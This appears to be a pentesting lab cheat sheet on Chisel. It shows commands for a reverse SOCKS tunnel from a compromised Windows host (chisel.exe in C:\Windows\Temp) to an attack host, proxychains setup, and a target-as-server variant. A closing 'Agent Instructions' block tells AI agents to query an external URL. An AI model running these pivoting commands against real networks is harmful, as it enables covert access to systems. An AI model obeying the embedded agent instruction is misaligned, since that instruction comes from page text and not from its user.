# chisel ### Chisel - Reverse Tunnel * Attack Host ```bash ./chisel server --reserve 2022/11/06 10:57:00 server: Reverse tunnelling enabled 2022/11/06 10:57:00 server: Fingerprint CelKxt2EsL1SUFnvo634FucIOPqlFKQJi8t/aTjRfWo= 2022/11/06 10:57:00 server: Listening on http://0.0.0.0:8080 ``` * Target Host ```shell C:\Windows\Temp\chisel.exe client :8080 R:socks ``` * Verify Listening Port ```shell dado1513@htb[/htb]$ netstat -lnpt | grep 1080 (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) tcp 0 0 127.0.0.1:1080 0.0.0.0:* LISTEN 446306/./chisel ``` * Configure Proxychains ```shell dado1513@htb[/htb]$ cat /etc/proxychains.conf [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks5 127.0.0.1 1080 ``` * Killing Chisel ```powershell Stop-Process -Name chisel -Force ``` ### Target Host as Server * Target Host ```powershell PS> C:\Windows\Temp\chisel.exe server --socks5 ``` * Attack Host ```shell dado1513@htb[/htb]$ sudo chisel client 10.129.204.133:8080 socks 2022/11/22 06:56:01 client: Connecting to ws://10.129.204.133:8080 2022/11/22 06:56:01 client: tun: proxy#127.0.0.1:1080=>socks: Listening 2022/11/22 06:56:02 client: Connected (Latency 124.871246ms) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dado1513.dev/tools/chisel.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.